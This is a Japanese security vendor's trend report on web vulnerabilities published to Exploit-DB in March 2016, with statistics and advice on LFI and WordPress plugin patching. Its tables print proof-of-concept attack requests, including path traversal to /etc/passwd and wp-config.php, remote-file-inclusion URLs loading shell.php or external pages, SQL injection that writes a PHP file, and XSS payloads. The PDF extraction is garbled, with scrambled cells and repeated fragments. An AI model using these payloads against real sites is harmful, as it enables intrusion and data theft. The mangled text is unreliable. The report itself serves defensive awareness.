最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

(1)

(2)

1. 脆弱性別件数

脆弱性カテゴリ

件数

コード・インジェクション（Code Injection) 1 ファイルアップロード（File Upload) 1 SQL インジェクション（SQL Injection) 4 RFIリモートファイル挿入

（Remote File Inclusion:RFI) 4 クロスサイトスクリプティング

(Cross Site Scripting : XSS) 10 ローカルファイル挿入

（Local File Inclusion:LFI） 13

合計 33

2. 危険度別件数

危険度

件数

割合

早急対応要 6 18% 高 27 82% 合計 33 100%

3. 攻撃実行の難易度別件数

難易度

件数

割合

難 3 9% 中 3 9% 易 27 82% 合計 33 100%

4. 主なソフトウェア別脆弱性発生件数

件数

20

2

1

33

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

サマリー

ペンタセキュリティシステムズ株式会社R&Dセンター　データセキュリティチーム

ソフトウェア名

合計

2016年3月に公開されたExploit-DBの分析結果、Local File Inclusion攻撃に対する脆弱性報告数が最も多かったです。Local File Inclusion攻撃は、主にDirectory Traversal攻撃と共に行われる攻撃

として対象ファイルが攻撃対象サーバーに位置しているとき、発生します。Local File Inclusion攻撃は、パラメーター値の経路を単純操作する形態の簡単な攻撃です。当該攻撃は、システムファイルがユーザに露出

される被害を起こすため、難易度に比べて危険度が高い脆弱性です。Local File Inclusion攻撃を予防するための最も良い方法は、ソースコードを安全に修正することです。しかし、サイトの規模が大きくて該当サ

ーバーのすべての入力値を検証しにくい状況なら、Ｗebアプリケーションファイアウォールを導入するのが現実的に適切な方法です。主なソフトウェア別脆弱性発生現状から見れば、Open Source CMSとして広く知ら

れているWordpressで最も多い脆弱性が報告されました。分析されたWordpress脆弱性は、Wordpress自体の脆弱性というよりは主に新規Pluginの脆弱性でした。Wordpressを使用する管理者は、使用中

のPlguinのセキュリティパッチを実施して、サーバーが脆弱性にさらされないように注意しなければなりません。

iTop

Joomla

Monstra

Zenphoto

Wordpress

ProjectSend

CubeCart

Liferay Portal

PivotX

TeamPass

1 1 4 4 10 13 33 0 5 10 15 20 25 30 35

脆弱性別件数

6 27

危険度別分類

早急対応要高 3 3 27

攻撃実行の難易度別件数

難中易 20 2 2 2 2 11 1 1 1

主なソフトウェア別脆弱性発生件数

Wordpress PivotX TeamPass ProjectSend CubeCart Liferay Portal iTop Zenphoto Joomla Monstra

(3)

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

中

：情報漏洩

　　　するため、高度な攻撃コードを採用したパターン、知らされていない攻撃

　　　コードを採用したパターンのいずれかに該当する

** 5件以上発生した主なソフトウェア別脆弱性の詳細情報

EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名

39513

File Upload

易

高

WordPress CP Polls Plugin 1.0.8 - admin.php XSS 脆弱性

Wordpress

39547

XSS

易

高

WordPress Best Web Soft Captcha Plugin <= 4.1.5 - admin.php

XSS 脆弱性(2)

Wordpress

39548

XSS

易

高

WordPress WP Advanced Comment Plugin 0.10 - / XSS 脆弱性

Wordpress

39547

XSS

易

高

WordPress Best Web Soft Captcha Plugin <= 4.1.5 - admin.php

XSS 脆弱性

Wordpress

39553

XSS

易

高

WordPress DZS Videogallery Plugin <=8.60 - popup.php XSS 脆弱性 Wordpress

39553

XSS

易

高

WordPress DZS Videogallery Plugin <=8.60 - ajax.php XSS 脆弱

性

Wordpress

39558

LFI

易

高

Wordpress Site Import Plugin 1.0.1 - page.php LFI 脆弱性

Wordpress

39558

RFI

易

早急対応要

Wordpress Site Import Plugin 1.0.1 - page.php RFI 脆弱性

Wordpress

39584

LFI

易

高

WordPress Image Export Plugin 1.1.0 - download.php LFI 脆弱性

Wordpress

39577

LFI

易

高

WordPress Abtest Plugin - abtest_admin.php LFI 脆弱性

Wordpress

39575

LFI

易

高

WordPress eBook Download Plugin 1.1 - filedownload.php LFI

_脆弱性

Wordpress

39593

LFI

易

高

WordPress Memphis Document Library Plugin 3.1.5 - / LFI 脆弱性

Wordpress

39593

LFI

易

高

WordPress Memphis Document Library Plugin 3.1.5 -

/mdocs-posts/ LFI 脆弱性

Wordpress

39592

LFI

易

高

WordPress Dharma booking Plugin 2.38.3 - proccess.php LFI 脆

_弱性

Wordpress

39592

RFI

易

高

WordPress Dharma booking Plugin 2.38.3 - proccess.php RFI 脆

_弱性

Wordpress

39591

LFI

易

高

WordPress Brandfolder Plugin 3.0 - callback.php LFI 脆弱性

Wordpress

39591

RFI

易

高

WordPress Brandfolder Plugin 3.0 - callback.php RFI 脆弱性

Wordpress

39589

LFI

易

高

WordPress HB Audio Gallery Lite Plugin 1.0.0 -

audio-download.php LFI 脆弱性

Wordpress

39623

LFI

易

高

WordPress Photocart Link Plugin 1.6 - decode.php LFI 脆弱性

Wordpress

39621

LFI

易

高

Wordpress Plugin IMDb Profile Widget 1.0.8 - pic.php LFI 脆弱性

Wordpress

　　　既知の攻撃コードを採用したパターンのいずれかに該当する

中

：攻撃手法自体は難しくないが、迂回コードを採用したパターン

早急対応要：攻撃が成功した場合システムへ侵入可

高

：システム情報を取得するか、あるいはクライアントに2次被害を及ぼす

危険度分類基準

難：複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得

易

：1回のリクエストで攻撃が成立するパターン、複数回トライするも、

攻撃実行難易度分類基準

(4)

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

2016-03-01 39513 File Upload 易高 WordPress CP Polls Plugin 1.0.8 -_{admin.php XSS 脆弱性} POST

/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1 HTTP/1.1

Host:

Connection: CloseAccept: text/html, application/xhtml+xml, */*

Accept-Language: ko-KR

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)

Content-Type: multipart/form-data; boundary=---7dd10029908f2

---7dd10029908f2 Content-Disposition: form-data; name="importfile"; filename="csv.csv"

Content-Type: application/octet-stream

Wordpress WordPress CP Polls_{Plugin 1.0.8}

2016-03-10 39547 XSS 易高 Plugin <= 4.1.5 - admin.php XSS 脆WordPress Best Web Soft Captcha 弱性(2)

/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3 Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

Wordpress Web Soft CaptchaWordPress Best Plugin <= 4.1.

2016-03-10 39548 XSS 易高 Comment Plugin 0.10 - / XSS 脆弱WordPress WP Advanced 性

POST / HTTP/1.1 Host:

Connection: CloseAccept: text/html, application/xhtml+xml, */*

Accept-Language: ko-KR

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Wordpress WordPress WP Advanced Comment Plugin 0.10

2016-03-10 39547 XSS 易高 Plugin <= 4.1.5 - admin.php XSS 脆WordPress Best Web Soft Captcha 弱性

POST

/wp-admin/admin.php?page=captcha.php&action=whitelist HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7

Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

s=<script>alert(1);</script>&search IP=Click here to claim your prize!

Wordpress

WordPress Best Web Soft Captcha

Plugin <= 4.1.

2016-03-11 39553 XSS 易高 WordPress DZS Videogallery Plugin_{<=8.60 - popup.php XSS 脆弱性} /wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava1 8642%27%3balert%281%29%2f%2f645

Wordpress Videogallery PluginWordPress DZS <=8.6

2016-03-11 39553 XSS 易高 WordPress DZS Videogallery Plugin_{<=8.60 - ajax.php XSS 脆弱性} /wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1) <%2fscript>894ba&type=&width=

Wordpress Videogallery PluginWordPress DZS <=8.6

2016-03-14 39558 LFI 易高 Wordpress Site Import Plugin 1.0.1_{- page.php LFI 脆弱性} /wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\ ..\..\..\..\..\..\windows\win.ini

Wordpress _{Import Plugin 1.0.1}Wordpress Site

2016-03-14 39558 RFI 易早急対応要 Wordpress Site Import Plugin 1.0.1_{- page.php RFI 脆弱性} /wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fsh

ell.php?shell=ls Wordpress

Wordpress Site Import Plugin 1.0.

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

(5)

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-03-14 39559 SQL Injection 難早急対応要 TeamPass 2.1.24 - item.query.php_{SQL Injection 脆弱性}

POST /source/item.query.php HTTP/1.1 Host:

Accept: */*

type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1

TeamPass TeamPass 2.1.2

2016-03-14 39559 SQL Injection 難早急対応要 TeamPass 2.1.24 - view.query.php_{SQL Injection 脆弱性}

POST /source/view.query.php HTTP/1.1 Host:

Accept: */*

type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC

TeamPass TeamPass 2.1.2

2016-03-16 39567 XSS 易高 Monstra CMS 3.0.3 - /monstra-_{3.0.3/users/8/edit XSS 脆弱性}

POST /monstra-3.0.3/users/8/edit HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_i d=8&login=user&firstname=%22%3E%3Cscript%3Ealert%28 1%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscrip t%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22% 3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&tw itter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fsc ript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B %3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert %281%29%3B%3C%2Fscript%3E&new_password=&edit_pr ofile=Save Monstra Monstra CMS 3.0.

2016-03-17 39571 RFI 易高 Zenphoto 1.4.11 - admin-logs.php_{RFI 脆弱性}

/zp-core/admin-logs.php?action=download_log&page=logs&tab=http://localho st/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&fil ename=security&XSRFToken=afd5bafed21279d837486fd2bee a81f87bc29dea Zenphoto Zenphoto 1.4.11

2016-03-17 39572 LFI 中高 PivotX 2.3.11 - index.php LFI 脆弱_性 /pivotx_latest/pivotx/index.php?page=media&del=...//...//...//...//...//...//...//...//...//...//...//...//important/important.file

&pivotxsession=ovyyn4ob2jc5ym92 PivotX PivotX 2.3.11

2016-03-17 39572 LFI 中早急対応要 PivotX 2.3.11 - ajaxhelper.php LFI_脆弱性 /pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.. ...//...//...//...//...//...//...//...//...//...//...//...//etc/passwd

PivotX PivotX 2.3.11

2016-03-21 39588 XSS 易高 ProjectSend r582 - index.php XSS_脆弱性

POST /my_files/index.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; ProjectSend ProjectSend r58 2016-03-21 39588 XSS 易高 ProjectSend r582 - clients.php XSS_脆弱性 POST /clients.php HTTP/1.1 Host:

Accept: */*

ProjectSend ProjectSend r58

2016-03-21 39587 Code Injection 中早急対応要 iTop 2.2.1 - config.php Code_{Injection 脆弱性}

POST

/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor HTTP/1.1 Host:

(6)

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-03-21 39584 LFI 易高 _{1.1.0 - download.php LFI 脆弱性}WordPress Image Export Plugin /wp-content/plugins/image-_{export/download.php?file=../../../wp-config.php} WordPress _{Export Plugin 1.1.0}WordPress Image

2016-03-21 39577 LFI 易高 _{abtest_admin.php LFI 脆弱性}WordPress Abtest Plugin - /wp-content/plugins/abtest/abtest_admin.php?action=../../etc/pass

wd WordPress

WordPress Abtest Plugin

2016-03-21 39575 LFI 易高 WordPress eBook Download Plugin_{1.1 - filedownload.php LFI 脆弱性} /wp-content/plugins/ebook-

download/filedownload.php?ebookdownloadurl=../../../wp-config.php WordPress

WordPress eBook Download Plugin

1.1

2016-03-22 39593 LFI 易高 _{Library Plugin 3.1.5 - / LFI 脆弱性}WordPress Memphis Document /?mdocs-img-preview=../../../wp-config.php WordPress

WordPress Memphis Document Library

Plugin 3.1.5

2016-03-22 39593 LFI 易高 Library Plugin 3.1.5 - /mdocs-posts/WordPress Memphis Document

LFI 脆弱性 /mdocs-posts/?mdocs-img-preview=../../../wp-config.php WordPress

WordPress Memphis Document Library

Plugin 3.1.5

2016-03-22 39592 LFI 易高 WordPress Dharma booking Plugin_{2.38.3 - proccess.php LFI 脆弱性} /wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../.. /../../../etc/passwd%00

WordPress WordPress Dharmabooking Plugin 2.38.3

2016-03-22 39592 RFI 易高 WordPress Dharma booking Plugin_{2.38.3 - proccess.php RFI 脆弱性} /wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=http:/ /www.example.com/index.php

WordPress WordPress Dharmabooking Plugin 2.38.3

2016-03-22 39591 LFI 易高 WordPress Brandfolder Plugin 3.0 -_{callback.php LFI 脆弱性} /wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../

wp-config.php%00 WordPress

WordPress Brandfolder Plugin

3.0

2016-03-22 39591 RFI 易高 WordPress Brandfolder Plugin 3.0 -_{callback.php RFI 脆弱性} /wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=http:// www.example.com/index.php

WordPress Brandfolder PluginWordPress 3.0 2016-03-22 39590 SQL Injection 易高 Joomla Easy Youtube Gallery 1.0.2_{- index.php SQL Injection 脆弱性} /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27%20or%20%271%27=%271%27&defaul

tvideo=9&Itemid=752 Joomla

Joomla Easy Youtube Gallery

1.0.2 2016-03-22 39589 LFI 易高 Plugin 1.0.0 - audio-download.phpWordPress HB Audio Gallery Lite

LFI 脆弱性

/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 WordPress

WordPress HB Audio Gallery Lite

(7)

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

42456 39623 LFI 易高 WordPress Photocart Link Plugin_{1.6 - decode.php LFI 脆弱性} /wp-content/plugins/photocart-_{link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==} WordPress

WordPress Photocart Link

Plugin 1.6

2016-03-27 39621 LFI 易高 _{Widget 1.0.8 - pic.php LFI 脆弱性}Wordpress Plugin IMDb Profile /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-_config.php WordPress Wordpress PluginIMDb Profile Widget 1.0.8 2016-03-28 39626 XSS 易高 _{/user/test/home XSS 脆弱性}Liferay Portal 5.1.2

-POST

/user/test/home?p_p_id=79&p_p_lifecycle=1&p_p_state=maxi mized&p_p_mode=view&_79_struts_action=%2Fenterprise_ad min%2Fedit_user HTTP/1.1

Host:

Liferay Portal Liferay Portal 5.1.2

2016-03-30 39637 SQL Injection 難早急対応要 CubeCart 6.0.10 - admin.php SQL_{Injection 脆弱性}

/admin.php?_g=products&cat_id=1&sort[updated]=DESC&cha r=T]%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'<? phpinfo(); ?>',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20I NTO%20OUT FILE%20'/var/www/site/file.php'%20--%202 CubeCart CubeCart 6.0.10 2016-03-30 39637 XSS 易高 CubeCart 6.0.10 - index.php XSS_脆弱性 POST /index.php?_a=profile HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 first_name=" onmouseover="javascript:alert(/ImmuniWeb/);" CubeCart CubeCart 6.0.10

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

1. 脆弱性別件数

脆弱性カテゴリ

件数

2. 危険度別件数

件数

割合

3. 攻撃実行の難易度別件数

難易度

件数

割合

4. 主なソフトウェア別脆弱性発生件数

件数

20

2

2

2

2

1

1

1

1

1

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

サマリー

ソフトウェア名

2016年3月に公開されたExploit-DBの分析結果、Local File Inclusion攻撃に対する脆弱性報告数が最も多かったです。Local File Inclusion攻撃は、主にDirectory Traversal攻撃と共に行われる攻撃

として対象ファイルが攻撃対象サーバーに位置しているとき、発生します。Local File Inclusion攻撃は、パラメーター値の経路を単純操作する形態の簡単な攻撃です。当該攻撃は、システムファイルがユーザに露出

される被害を起こすため、難易度に比べて危険度が高い脆弱性です。Local File Inclusion攻撃を予防するための最も良い方法は、ソースコードを安全に修正することです。 しかし、サイトの規模が大きくて該当サ

ーバーのすべての入力値を検証しにくい状況なら、Ｗebアプリケーションファイアウォールを導入するのが現実的に適切な方法です。主なソフトウェア別脆弱性発生現状から見れば、Open Source CMSとして広く知ら

れているWordpressで最も多い脆弱性が報告されました。分析されたWordpress脆弱性は、Wordpress自体の脆弱性というよりは主に新規Pluginの脆弱性でした。Wordpressを使用する管理者は、使用中

のPlguinのセキュリティパッチを実施して、サーバーが脆弱性にさらされないように注意しなければなりません。

iTop

Joomla

Monstra

Zenphoto

Wordpress

ProjectSend

CubeCart

Liferay Portal

PivotX

TeamPass

脆弱性別件数

危険度別分類

攻撃実行の難易度別件数

主なソフトウェア別脆弱性発生件数

2016.03.01~2016.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

中

：情報漏洩

するため、高度な攻撃コードを採用したパターン、知らされていない攻撃

コードを採用したパターンのいずれかに該当する

** 5件以上発生した主なソフトウェア別脆弱性の詳細情報

39513

File Upload

易

高

WordPress CP Polls Plugin 1.0.8 - admin.php XSS 脆弱性

Wordpress

39547

XSS

易

高

WordPress Best Web Soft Captcha Plugin <= 4.1.5 - admin.php

XSS 脆弱性(2)

Wordpress

39548

XSS

易

高

WordPress WP Advanced Comment Plugin 0.10 - / XSS 脆弱性

Wordpress

39547

XSS

易

高

WordPress Best Web Soft Captcha Plugin <= 4.1.5 - admin.php

XSS 脆弱性

Wordpress

39553

XSS

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

される被害を起こすため、難易度に比べて危険度が高い脆弱性です。Local File Inclusion攻撃を予防するための最も良い方法は、ソースコードを安全に修正することです。しかし、サイトの規模が大きくて該当サ

　　　するため、高度な攻撃コードを採用したパターン、知らされていない攻撃

　　　コードを採用したパターンのいずれかに該当する

_脆弱性

_弱性

_弱性